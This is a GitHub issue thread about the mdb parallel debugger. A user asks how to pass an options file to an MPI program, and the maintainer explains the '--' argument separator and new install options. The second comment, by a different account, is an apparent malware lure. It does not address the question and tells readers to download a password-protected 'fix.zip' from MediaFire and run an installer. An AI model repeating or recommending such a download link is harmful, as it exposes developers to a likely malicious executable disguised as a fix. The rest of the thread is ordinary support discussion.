### ISSUE TITLE
.ex with option file

### ISSUE THREAD

**Issue by YL-codehub** [TomMelt/mdb#39]
Hi,
Thank you for this nice repository. I'm just started on it to debug some work with [GRTeclyn](https://github.com/GRTLCollaboration/GRTeclyn). I remember @TomMelt 's demo using the latter or GRChombo. However I'm struggling to reproduce that for the simple reason that I don't know how to handle an .ex with an options file. How did you do that @TomMelt ?
Thank you so much!
Yoann
PS: I don't think python>=3.8 is the right requirement.
Apparently matplotlib requires >=3.9 and >=10 is required to not get:
`TypeError: unsupported operand type(s) for |: 'types.GenericAlias' and 'types.GenericAlias' generated if <3.10`

**Comment by chenkeyu123** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by YL-codehub** [comment]
Thanks for your reply, I have read but not tried the tutorial. I didn't want to try until I know I can use an option file which I didn't find out... 
Ideally I'd like to debug something like:
`mpirun -n 8 ./main3d.gnu.MPI.ex ./jobs/dparams.txt `
I tried things like: 
`mdb launch -b gdb -n 4 -t ./main3d.gnu.MPI.ex ./jobs/dparams.txt --log-level=DEBUG`
but it didn't work:
```
DEBUG:asyncio:Using selector: EpollSelector
DEBUG:mdb.mdb_launch:launch command: mpirun --configfile .mdb.appfile
INFO:mdb.exchange_server:echange server started :: localhost:2000
ERROR:asyncio:Task exception was never retrieved
future: <Task finished name='Task-2' coro=<start_server() done, defined at /usr/lib64/python3.11/asyncio/streams.py:54> exception=OSError(99, "error while attempting to bind on address ('::1', 2000, 0, 0): cannot assign requested address")>
Traceback (most recent call last):
  File "/usr/lib64/python3.11/asyncio/streams.py", line 85, in start_server
    return await loop.create_server(factory, host, port, **kwds)
           ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/usr/lib64/python3.11/asyncio/base_events.py", line 1525, in create_server
    raise OSError(err.errno, 'error while attempting '
OSError: [Errno 99] error while attempting to bind on address ('::1', 2000, 0, 0): cannot assign requested address
Traceback (most recent call last):
  File "/rds/project/rds-YVo7YUJF2mk/yl844/env_mdb/bin/mdb", line 8, in <module>
    sys.exit(run_main())
             ^^^^^^^^^^
 
 ... etc
```

**Comment by TomMelt** [comment]
Sorry, this is my bad. I haven't written this into the tutorial yet... and I need to make it clearer in the docs, but if you have additional args for your program you can run it like this:

```
mdb launch -n 8 -t ./simple-mpi.exe -- -arg1 value
```

So for `mpirun -n 8 ./main3d.gnu.MPI.ex ./jobs/dparams.txt` it would be:

```
mdb launch -n 8 -t ./main3d.gnu.MPI.ex -- ./jobs/dparams.txt
```

**Notice** that there is a double hyphen `--` between your program arguments and the `mdb launch` command.

Any program arguments must come at the end of the command. So, if you also want debugging, make sure you select it before passing your args, e.g.,

```
mdb launch -n 8 -t ./main3d.gnu.MPI.ex --log-level=DEBUG -- ./jobs/dparams.txt
``` 

Thanks for spotting this gap in my documentation. I have raised issue #41 to address this.

**Comment by TomMelt** [comment]
Did that work?

Are you happy for me to close this issue?

**Comment by TomMelt** [comment]
I am working on a `spack` recipe. This will allow me to add it as a loadable module on csd3. I will try and get that done this week. If that works it may make it easier for you to use `mdb` on csd3

**Comment by TomMelt** [comment]
update: I have create the `spack` recipe https://github.com/spack/spack/pull/46800. It took longer than expected. I am hoping that I can get it added to csd3 soon, but this could take some time.

In the meantime, I made `mdb` `pip`-installable. So you can also try running `pip install mdb-debugger`. Please try with python version 3.11 or greater.

**Comment by TomMelt** [comment]
Closing this issue for now. If you still have a problem, please reopen, or create a new issue.
